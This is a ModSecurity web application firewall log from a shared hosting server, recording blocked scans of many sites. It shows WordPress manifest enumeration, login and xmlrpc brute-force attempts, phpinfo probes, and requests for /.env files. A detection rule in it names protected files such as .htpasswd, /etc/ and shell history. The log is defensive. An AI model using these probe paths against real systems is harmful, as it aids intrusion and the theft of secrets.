[Tue May 26 18:46:34.420753 2026] [security2:error] [pid 1025417:tid 1025659] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdMlHbArxonFeMXvQd1QAAAHA"]
[Tue May 26 18:46:34.654524 2026] [security2:error] [pid 1025417:tid 1025449] [remote 74.7.241.58:51824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWdMlHbArxonFeMXvQd5AAATR8"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/nationspioneer.com/wp-admin/includes
[Tue May 26 18:46:34.982943 2026] [security2:error] [pid 1025417:tid 1025555] [client 45.94.31.112:59611] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.krishnawoodworks.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWdMlHbArxonFeMXvQd6QAAAAg"]
[Tue May 26 18:46:35.194994 2026] [security2:error] [pid 1025417:tid 1025459] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/_profiler/phpinfo.php"] [unique_id "ahWdM1HbArxonFeMXvQd7QAAKCk"]
[Tue May 26 18:46:35.598743 2026] [security2:error] [pid 1025417:tid 1025568] [client 45.94.31.112:50991] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 112.31.94.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.krishnawoodworks.com"] [uri "/xmlrpc.php"] [unique_id "ahWdM1HbArxonFeMXvQd9AAAABU"]
[Tue May 26 18:46:35.842569 2026] [security2:error] [pid 1025417:tid 1025456] [remote 162.214.206.32:54960] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 32.206.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWdM1HbArxonFeMXvQd-AAAcSY"]
[Tue May 26 18:46:35.891764 2026] [security2:error] [pid 1025417:tid 1025458] [remote 54.39.89.63:18802] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "onesoft.in"] [uri "/"] [unique_id "ahWdM1HbArxonFeMXvQd-QAAHyg"]
[Tue May 26 18:46:35.891974 2026] [security2:error] [pid 1025417:tid 1025578] [client 54.39.89.63:18802] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "onesoft.in"] [uri "/"] [unique_id "ahWdM1HbArxonFeMXvQd-QAAHyg"]
[Tue May 26 18:46:35.991895 2026] [security2:error] [pid 1025417:tid 1025465] [remote 162.214.206.32:54960] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 32.206.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWdM1HbArxonFeMXvQeAAAAUS8"], referer: https://atreegroup.com/wp-login.php
[Tue May 26 18:46:36.224802 2026] [security2:error] [pid 1025417:tid 1025616] [client 45.94.31.112:52719] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.krishnawoodworks.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWdNFHbArxonFeMXvQeCwAAAEU"]
[Tue May 26 18:46:36.378706 2026] [security2:error] [pid 1025417:tid 1025608] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdM1HbArxonFeMXvQd_wAAAD0"]
[Tue May 26 18:46:36.731911 2026] [security2:error] [pid 1025417:tid 1025604] [client 107.170.66.128:61127] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.jhonweb.com"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahWdNFHbArxonFeMXvQeHwAAADk"]
[Tue May 26 18:46:37.014646 2026] [security2:error] [pid 1025417:tid 1025610] [client 34.123.176.35:56536] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.176.123.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "webmail.arborvitae.in"] [uri "/xmlrpc.php"] [unique_id "ahWdNFHbArxonFeMXvQeIAAAAD8"]
[Tue May 26 18:46:37.081394 2026] [security2:error] [pid 1025417:tid 1025470] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/phpinfo.php"] [unique_id "ahWdNVHbArxonFeMXvQeJgAAfTQ"]
[Tue May 26 18:46:37.376315 2026] [security2:error] [pid 1025417:tid 1025586] [client 34.123.176.35:61609] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.arborvitae.in"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWdNVHbArxonFeMXvQeLwAAACc"]
[Tue May 26 18:46:37.636086 2026] [security2:error] [pid 1025417:tid 1025565] [client 45.94.31.112:54016] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.krishnawoodworks.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWdNVHbArxonFeMXvQeOgAAABI"]
[Tue May 26 18:46:37.714062 2026] [security2:error] [pid 1025417:tid 1025638] [client 34.123.176.35:62573] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.arborvitae.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWdNVHbArxonFeMXvQePgAAAFs"]
[Tue May 26 18:46:37.989094 2026] [security2:error] [pid 1025417:tid 1025582] [client 45.94.31.112:62337] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.krishnawoodworks.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWdNVHbArxonFeMXvQeQgAAACM"]
[Tue May 26 18:46:37.991316 2026] [security2:error] [pid 1025417:tid 1025608] [client 34.123.176.35:58106] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.arborvitae.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWdNVHbArxonFeMXvQeQwAAAD0"]
[Tue May 26 18:46:38.220402 2026] [security2:error] [pid 1025417:tid 1025604] [client 34.123.176.35:53881] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.arborvitae.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWdNlHbArxonFeMXvQeSwAAADk"]
[Tue May 26 18:46:38.320859 2026] [security2:error] [pid 1025417:tid 1025573] [client 45.94.31.112:55129] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.krishnawoodworks.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWdNlHbArxonFeMXvQeTgAAABo"]
[Tue May 26 18:46:38.447336 2026] [security2:error] [pid 1025417:tid 1025478] [remote 74.208.170.33:45622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.170.208.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdNlHbArxonFeMXvQeTQAAMzw"]
[Tue May 26 18:46:38.640916 2026] [security2:error] [pid 1025417:tid 1025593] [client 34.123.176.35:56359] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.arborvitae.in"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahWdNlHbArxonFeMXvQeWAAAAC4"]
[Tue May 26 18:46:38.669760 2026] [security2:error] [pid 1025417:tid 1025603] [client 45.94.31.112:64822] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.krishnawoodworks.com"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahWdNlHbArxonFeMXvQeWgAAADg"]
[Tue May 26 18:46:38.782350 2026] [security2:error] [pid 1025417:tid 1025475] [remote 45.148.10.5:61680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env"] [unique_id "ahWdNlHbArxonFeMXvQeXgAAfTk"]
[Tue May 26 18:46:38.853724 2026] [security2:error] [pid 1025417:tid 1025663] [client 34.123.176.35:57101] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.arborvitae.in"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWdNlHbArxonFeMXvQeYwAAAHQ"]
[Tue May 26 18:46:38.948567 2026] [security2:error] [pid 1025417:tid 1025479] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/info.php"] [unique_id "ahWdNlHbArxonFeMXvQeZAAAYz0"]
[Tue May 26 18:46:39.007529 2026] [security2:error] [pid 1025417:tid 1025658] [client 45.94.31.112:52642] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.krishnawoodworks.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWdN1HbArxonFeMXvQeaAAAAG8"]
[Tue May 26 18:46:39.047017 2026] [security2:error] [pid 1025417:tid 1025485] [remote 193.42.61.12:46488] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdNlHbArxonFeMXvQeYgAACUM"]
[Tue May 26 18:46:39.171421 2026] [security2:error] [pid 1025417:tid 1025602] [client 34.123.176.35:61991] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.arborvitae.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWdN1HbArxonFeMXvQebQAAADc"]
[Tue May 26 18:46:39.332451 2026] [security2:error] [pid 1025417:tid 1025588] [client 45.94.31.112:50355] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.krishnawoodworks.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWdN1HbArxonFeMXvQedAAAACk"]
[Tue May 26 18:46:39.430022 2026] [security2:error] [pid 1025417:tid 1025645] [client 34.123.176.35:58497] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.arborvitae.in"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWdN1HbArxonFeMXvQeegAAAGI"]
[Tue May 26 18:46:39.680369 2026] [security2:error] [pid 1025417:tid 1025643] [client 45.94.31.112:57485] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.krishnawoodworks.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWdN1HbArxonFeMXvQeggAAAGA"]
[Tue May 26 18:46:39.808963 2026] [security2:error] [pid 1025417:tid 1025604] [client 34.123.176.35:54166] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.arborvitae.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWdN1HbArxonFeMXvQeigAAADk"]
[Tue May 26 18:46:40.035831 2026] [security2:error] [pid 1025417:tid 1025617] [client 45.94.31.112:61208] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.krishnawoodworks.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWdOFHbArxonFeMXvQekAAAAEY"]
[Tue May 26 18:46:40.166381 2026] [security2:error] [pid 1025417:tid 1025627] [client 34.123.176.35:49694] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.arborvitae.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWdOFHbArxonFeMXvQelQAAAFA"]
[Tue May 26 18:46:40.179328 2026] [security2:error] [pid 1025417:tid 1025649] [client 51.68.107.150:31235] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ktmadvance-senegal.com"] [uri "/robots.txt"] [unique_id "ahWdOFHbArxonFeMXvQelgAAAGY"]
[Tue May 26 18:46:40.179435 2026] [security2:error] [pid 1025417:tid 1025649] [client 51.68.107.150:31235] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ktmadvance-senegal.com"] [uri "/robots.txt"] [unique_id "ahWdOFHbArxonFeMXvQelgAAAGY"]
[Tue May 26 18:46:40.420479 2026] [security2:error] [pid 1025417:tid 1025571] [client 45.94.31.112:52550] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.krishnawoodworks.com"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahWdOFHbArxonFeMXvQengAAABg"]
[Tue May 26 18:46:40.746660 2026] [security2:error] [pid 1025417:tid 1025581] [client 45.94.31.112:49359] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.krishnawoodworks.com"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahWdOFHbArxonFeMXvQeqgAAACI"]
[Tue May 26 18:46:40.943061 2026] [security2:error] [pid 1025417:tid 1025493] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/pinfo.php"] [unique_id "ahWdOFHbArxonFeMXvQetAAADEs"]
[Tue May 26 18:46:41.079379 2026] [security2:error] [pid 1025417:tid 1025660] [client 45.94.31.112:52568] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.krishnawoodworks.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWdOVHbArxonFeMXvQetQAAAHE"]
[Tue May 26 18:46:41.320501 2026] [security2:error] [pid 1025417:tid 1025502] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdOVHbArxonFeMXvQetgAAK1Q"]
[Tue May 26 18:46:41.320890 2026] [security2:error] [pid 1025417:tid 1025590] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdOVHbArxonFeMXvQetgAAK1Q"]
[Tue May 26 18:46:41.437644 2026] [security2:error] [pid 1025417:tid 1025656] [client 45.94.31.112:50837] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.krishnawoodworks.com"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahWdOVHbArxonFeMXvQevQAAAG0"]
[Tue May 26 18:46:41.592034 2026] [security2:error] [pid 1025417:tid 1025568] [client 66.249.64.1:41452] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahWdOFHbArxonFeMXvQenQAAABU"], referer: https://www.yourstorybag.com/the-misfit-bangali/
[Tue May 26 18:46:41.592142 2026] [security2:error] [pid 1025417:tid 1025648] [client 66.249.64.1:44940] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahWdN1HbArxonFeMXvQefQAAAGU"], referer: https://www.yourstorybag.com/the-misfit-bangali/
[Tue May 26 18:46:42.070142 2026] [security2:error] [pid 1025417:tid 1025582] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdOVHbArxonFeMXvQewgAAACM"]
[Tue May 26 18:46:42.281824 2026] [security2:error] [pid 1025417:tid 1025598] [client 66.249.64.2:55678] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahWdOlHbArxonFeMXvQezAAAADM"], referer: https://www.yourstorybag.com/the-misfit-bangali/
[Tue May 26 18:46:42.580270 2026] [security2:error] [pid 1025417:tid 1025560] [client 172.226.44.147:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWdOlHbArxonFeMXvQe2wAAAA0"]
[Tue May 26 18:46:42.699674 2026] [security2:error] [pid 1025417:tid 1025587] [client 162.243.41.33:49457] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWdOlHbArxonFeMXvQe4AAAACg"]
[Tue May 26 18:46:43.308199 2026] [security2:error] [pid 1025417:tid 1025504] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/i.php"] [unique_id "ahWdO1HbArxonFeMXvQe7gAAJ1Y"]
[Tue May 26 18:46:43.478952 2026] [security2:error] [pid 1025417:tid 1025660] [client 66.249.64.3:56983] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahWdO1HbArxonFeMXvQe7QAAAHE"], referer: https://www.yourstorybag.com/the-misfit-bangali/
[Tue May 26 18:46:43.547538 2026] [security2:error] [pid 1025417:tid 1025505] [remote 74.7.241.58:60876] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWdO1HbArxonFeMXvQe9QAAD1c"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/nationspioneer.com/wp-admin/includes
[Tue May 26 18:46:44.706109 2026] [security2:error] [pid 1025417:tid 1025655] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdPFHbArxonFeMXvQfBwAAAGw"]
[Tue May 26 18:46:45.011377 2026] [security2:error] [pid 1025417:tid 1025611] [client 89.124.113.81:52108] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.113.124.89.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahWdPFHbArxonFeMXvQfFAAAAEA"], referer: https://bosscoirs.com/2023/03/17/coconut-rope/
[Tue May 26 18:46:45.011529 2026] [security2:error] [pid 1025417:tid 1025611] [client 89.124.113.81:52108] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahWdPFHbArxonFeMXvQfFAAAAEA"], referer: https://bosscoirs.com/2023/03/17/coconut-rope/
[Tue May 26 18:46:45.133933 2026] [security2:error] [pid 1025417:tid 1025631] [client 178.20.43.173:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWdPVHbArxonFeMXvQfKQAAAFQ"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1221328&moderation-hash=60db0a56c75d1a789598e9219cc7ef26
[Tue May 26 18:46:45.251062 2026] [security2:error] [pid 1025417:tid 1025591] [client 113.164.85.224:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdPFHbArxonFeMXvQfGgAAACw"]
[Tue May 26 18:46:45.256335 2026] [security2:error] [pid 1025417:tid 1025520] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/web/.env"] [unique_id "ahWdPVHbArxonFeMXvQfLQAAdGY"]
